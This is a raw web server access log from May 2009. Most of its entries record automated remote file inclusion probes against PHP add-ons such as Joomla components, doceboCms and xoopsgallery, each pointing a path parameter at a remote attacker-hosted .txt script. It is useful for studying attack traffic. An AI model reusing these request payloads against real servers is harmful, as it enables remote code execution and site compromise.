218.185.20.88 - - [13/May/2009:06:55:50 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:55:50 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:55:50 -0400] "GET /logs/access_log.Q108072000//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
210.240.12.4 - - [13/May/2009:06:55:51 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.koreavan.kr/bbs/id1.txt?%0D? HTTP/1.1" 404 250 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
210.240.12.4 - - [13/May/2009:06:55:51 -0400] "GET /logs/access_log.Q108082700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.koreavan.kr/bbs/id1.txt?%0D? HTTP/1.1" 404 277 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
210.240.12.4 - - [13/May/2009:06:55:51 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.koreavan.kr/bbs/id1.txt?%0D? HTTP/1.1" 404 255 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.185.20.88 - - [13/May/2009:06:55:55 -0400] "GET /logs/access_log.Q108062800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
69.237.82.158 - - [13/May/2009:06:55:55 -0400] "GET /logs/access_log.Q108102500//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.814"
218.185.20.88 - - [13/May/2009:06:56:04 -0400] "GET /logs/access_log.Q108051800%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:06:56:06 -0400] "GET /logs/access_log.Q108101700//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
207.58.155.211 - - [13/May/2009:06:56:12 -0400] "GET /logs/access_log.Q108081700%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:56:12 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:56:12 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:56:12 -0400] "GET /logs/access_log.Q109050200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
200.32.100.130 - - [13/May/2009:06:56:15 -0400] "GET /xGB.php?act=admin&do=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
124.0.54.98 - - [13/May/2009:06:56:16 -0400] "GET /logs/access_log.Q109011100//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
124.0.54.98 - - [13/May/2009:06:56:16 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
124.0.54.98 - - [13/May/2009:06:56:16 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
85.119.158.133 - - [13/May/2009:06:56:21 -0400] "GET /logs/access_log.Q108072000%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
124.0.54.98 - - [13/May/2009:06:56:22 -0400] "GET /logs/access_log.Q109011100//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
124.0.54.98 - - [13/May/2009:06:56:22 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
124.0.54.98 - - [13/May/2009:06:56:22 -0400] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
121.165.73.157 - - [13/May/2009:06:56:22 -0400] "GET /logs/access_log.Q108102500//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
85.119.158.133 - - [13/May/2009:06:56:22 -0400] "GET /logs/access_log.Q108081300%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:56:24 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:56:24 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:56:24 -0400] "GET /logs/access_log.Q108072000//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:56:25 -0400] "GET /xGB.php?act=admin&do=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
124.0.54.98 - - [13/May/2009:06:56:27 -0400] "GET /logs/access_log.Q109011600//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
200.32.100.130 - - [13/May/2009:06:56:29 -0400] "GET /logs/xGB.php?act=admin&do=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:56:29 -0400] "GET /logs/access_log.Q108081000%20%20/xGB.php?act=admin&do=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:06:56:29 -0400] "GET /logs/access_log.Q108081300//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.249.72.114 - - [13/May/2009:06:56:31 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [13/May/2009:06:56:31 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0058EE471230390065AB06G+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.0.54.98 - - [13/May/2009:06:56:32 -0400] "GET /logs/access_log.Q109011600//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
200.32.100.130 - - [13/May/2009:06:56:32 -0400] "GET /logs/access_log.Q108120300%20%20/xGB.php?act=admin&do=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:56:35 -0400] "GET /logs/access_log.Q108120300%20%20/xGB.php?act=admin&do=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:56:35 -0400] "GET /logs/access_log.Q108081000%20%20/xGB.php?act=admin&do=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:56:38 -0400] "GET /logs/xGB.php?act=admin&do=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:56:44 -0400] "GET /logs/xGB.php?act=admin&do=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:56:44 -0400] "GET /xGB.php?act=admin&do=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:56:44 -0400] "GET /logs/access_log.Q108120300/xGB.php?act=admin&do=http://theblythes.net/cal/db/log?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.30.79.49 - - [13/May/2009:06:56:47 -0400] "GET /logs/access_log.Q107102000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.18.117.101 - - [13/May/2009:06:56:56 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:56:56 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:56:56 -0400] "GET /logs/access_log.Q108072000%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.240.12.4 - - [13/May/2009:06:57:00 -0400] "GET /logs/access_log.Q108083100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.koreavan.kr/bbs/id1.txt?%0D? HTTP/1.1" 404 277 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.119.158.133 - - [13/May/2009:06:57:12 -0400] "GET /logs/access_log.Q108072000%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:06:57:13 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.pride-ug.ru/v.txt??%0D? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.101.159.29 - - [13/May/2009:06:57:13 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.pride-ug.ru/v.txt??%0D? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.101.159.29 - - [13/May/2009:06:57:13 -0400] "GET /logs/access_log.Q108111600//components/com_flyspray/startdown.php?file=http://www.pride-ug.ru/v.txt??%0D? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.101.159.29 - - [13/May/2009:06:57:16 -0400] "GET /logs/access_log.Q108111500//components/com_flyspray/startdown.php?file=http://www.pride-ug.ru/v.txt??%0D? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
85.119.158.133 - - [13/May/2009:06:57:17 -0400] "GET /logs/access_log.Q108081300%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:06:57:18 -0400] "GET /logs/access_log.Q108072000//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.165.73.157 - - [13/May/2009:06:57:30 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:57:30 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:57:31 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:57:31 -0400] "GET /logs/access_log.Q108082100//admin/business_inc/saveserver.php?thisdir=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:06:57:39 -0400] "GET /logs/access_log.Q108111600/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:06:57:40 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
85.18.117.101 - - [13/May/2009:06:57:40 -0400] "GET /logs/access_log.Q108081300//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
69.94.56.98 - - [13/May/2009:06:57:44 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 261 "-" "libwww-perl/5.48"
69.94.56.98 - - [13/May/2009:06:57:44 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 256 "-" "libwww-perl/5.48"
67.204.0.222 - - [13/May/2009:06:57:46 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
121.165.73.157 - - [13/May/2009:06:57:50 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:57:50 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:57:50 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:57:50 -0400] "GET /logs/access_log.Q108082100//admin/business_inc/saveserver.php?thisdir=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:06:58:07 -0400] "GET /logs/access_log.Q109022600%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:06:58:24 -0400] "GET /logs/access_log.Q108083000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.30.79.49 - - [13/May/2009:06:58:29 -0400] "GET /logs/error_log.Q109030600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.165.73.157 - - [13/May/2009:06:58:39 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:58:39 -0400] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:58:39 -0400] "GET /logs/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:58:39 -0400] "GET /logs/access_log.Q109012800/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:58:45 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:58:45 -0400] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:58:45 -0400] "GET /logs/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:58:46 -0400] "GET /logs/access_log.Q109012800/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:58:50 -0400] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:58:50 -0400] "GET /logs/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:58:50 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:06:58:51 -0400] "GET /logs/access_log.Q109012800/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
222.122.160.145 - - [13/May/2009:06:58:53 -0400] "GET /logs/access_log.Q108061500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
67.204.0.222 - - [13/May/2009:06:59:00 -0400] "GET /logs/access_log.Q109011400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:06:59:01 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:06:59:01 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:06:59:13 -0400] "GET /logs/access_log.Q109011400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:06:59:14 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:06:59:14 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
69.237.82.158 - - [13/May/2009:06:59:33 -0400] "GET /logs/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.814"
69.237.82.158 - - [13/May/2009:06:59:33 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.814"
69.237.82.158 - - [13/May/2009:06:59:33 -0400] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.814"
69.237.82.158 - - [13/May/2009:06:59:35 -0400] "GET /logs/access_log.Q109012800/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mecgrassroots.org/wp-content/themes/talian-10/images/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.814"
200.32.100.130 - - [13/May/2009:06:59:53 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:59:53 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:06:59:53 -0400] "GET /logs/access_log.Q108063000/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:00:04 -0400] "GET /logs/access_log.Q108070200/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
172.16.1.157 - - [13/May/2009:07:00:08 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:07:00:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [13/May/2009:07:00:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
200.32.100.130 - - [13/May/2009:07:00:14 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:00:14 -0400] "GET /logs/access_log.Q108063000/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:00:17 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.165.73.157 - - [13/May/2009:07:00:18 -0400] "GET /logs/access_log.Q108102500%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
200.32.100.130 - - [13/May/2009:07:00:35 -0400] "GET /logs/access_log.Q108052200/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:07:00:53 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:07:00:53 -0400] "GET /logs/access_log.Q108072000//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:07:00:53 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.146.231.207 - - [13/May/2009:07:00:53 -0400] "GET /logs/access_log.Q108081700%20/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.65"
121.165.73.157 - - [13/May/2009:07:00:54 -0400] "GET /logs/access_log.Q108102500%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
85.18.117.101 - - [13/May/2009:07:01:24 -0400] "GET /logs/access_log.Q108081300//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:01:35 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:01:35 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:01:35 -0400] "GET /logs/access_log.Q108063000%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.32.100.130 - - [13/May/2009:07:01:44 -0400] "GET /logs/access_log.Q108070200%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hostmann-steinberg.ru////id.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:07:01:47 -0400] "GET /logs/access_log.Q108051800%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.165.73.157 - - [13/May/2009:07:01:58 -0400] "GET /logs/access_log.Q108102500%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
124.0.54.98 - - [13/May/2009:07:02:07 -0400] "GET /logs/access_log.Q109010100/index.php?str=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
124.0.54.98 - - [13/May/2009:07:02:07 -0400] "GET /index.php?str=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
124.0.54.98 - - [13/May/2009:07:02:07 -0400] "GET /logs/index.php?str=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
